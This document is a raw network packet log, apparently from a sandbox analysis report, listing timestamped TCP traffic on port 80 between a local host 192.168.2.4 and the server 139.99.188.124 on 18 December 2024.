                                                                              Dec 18, 2024 21:00:28.810467005 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.813138008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.813287973 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.813596010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.818651915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.818717003 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.818905115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.823787928 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.823935032 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.824290991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.829015017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.829077005 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.829571009 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.834332943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.834441900 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.834983110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.839696884 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.839780092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.840050936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.844993114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.845195055 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.845422983 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850712061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850729942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850867987 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.855498075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.855624914 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.856349945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.860744953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.861102104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.861207008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.866044044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.866133928 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.866545916 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.871392012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.871751070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.871818066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.876708031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.876780987 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.877126932 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.881942987 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.882077932 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.882388115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.998529911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.998823881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.998891115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.000880957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.000984907 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.001239061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.014369011 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.014743090 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.015084028 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.017152071 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.017164946 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.017242908 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.021835089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.022836924 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.023355961 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.026882887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.027302980 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.028498888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.028512955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.029000998 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.033262014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.033443928 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.034317970 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.037727118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.038135052 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.038209915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.042469025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.043014050 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.043349981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.047379017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.048614025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.051940918 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.052561045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.052572012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.052707911 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.057338953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.057351112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.057562113 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.061844110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.063371897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.063750982 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.066930056 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.066941977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.067065954 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.476053953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.476175070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.477833986 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.477844954 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.477894068 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.479609966 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.479629040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.479669094 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.481425047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.481451988 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.481544018 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.483526945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.483539104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.483831882 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.485557079 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.485599995 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.485600948 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.487914085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487926006 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487935066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487968922 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.488203049 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.490032911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.490046978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.490094900 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.491921902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.491936922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.492216110 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.493706942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.493720055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.493766069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.495779991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495795012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495805025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495956898 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.497816086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.497829914 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.497975111 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.499897003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.499908924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.500020981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.501948118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.501964092 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.502008915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.504180908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.504215002 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.504316092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.506215096 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506227016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506236076 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506361008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.506361008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.508347988 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.508362055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.508433104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.510492086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.510531902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.510572910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.512711048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.512736082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.512887955 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.514947891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.514961004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.514972925 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.515053988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.516689062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.516705036 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.516844988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.578799009 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.588809967 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.589232922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.589307070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.589473963 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.590406895 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.590462923 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.591367960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.591381073 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.591559887 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.593188047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.593202114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.593261957 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.595026016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.595942020 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.596184015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.596885920 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.596898079 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.597059965 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.598723888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.598736048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.598810911 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.600550890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.609342098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.609549999 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.609761953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.610717058 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.610908985 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.611651897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612576008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612588882 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612763882 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.614444017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.614459038 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.614556074 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.616417885 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.616430998 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.616597891 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.618122101 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.618140936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.618644953 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.619992018 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.620007992 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.620075941 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.621830940 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.621845961 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.621917963 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.623632908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.623656034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.624030113 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.625742912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.625763893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.625813007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.627901077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.627916098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.627975941 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.629877090 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.629893064 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.629944086 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.631949902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.631963968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.631974936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.632252932 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.632253885 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.633929014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.633951902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.634038925 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.636181116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.636194944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.636241913 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.638073921 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638088942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638099909 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638561964 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.640145063 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.640160084 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.641809940 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.642128944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642148972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642162085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642210007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.642210007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.644195080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.644222021 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.644377947 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.646230936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.646243095 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.647279978 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.647763968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.647789001 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.648436069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.649599075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.649611950 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.649713993 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.651407003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651422977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651437998 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651485920 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.653214931 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.653264046 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.653323889 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.654920101 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.654947996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.654983044 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.656686068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.656702042 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.656814098 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.658535004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658551931 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658564091 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658620119 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.658654928 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.660279036 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.660301924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.660378933 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.662019014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.662075996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.662256002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.663801908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.663827896 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.664103985 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.665740013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.665756941 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.665811062 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.009881973 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.011363983 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.011394978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.011454105 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.013207912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.013221979 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.013286114 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.014959097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.014971972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.015053988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.016724110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016737938 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016747952 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016813040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.016813040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.018569946 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.018583059 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.018675089 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.020311117 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.020324945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.020382881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.022114992 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.022126913 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.022197008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.023866892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023880959 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023905039 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023953915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.025638103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.025651932 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.025727034 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.027383089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.027395010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.027502060 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.029177904 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029191971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029203892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029295921 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.030970097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.030983925 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.031111002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.032835960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.032850027 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.033086061 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.034542084 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.034562111 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.034642935 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.036313057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.036329031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.036408901 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.038120031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038134098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038144112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038216114 CET4974480192.168.2.4139.99.188.124
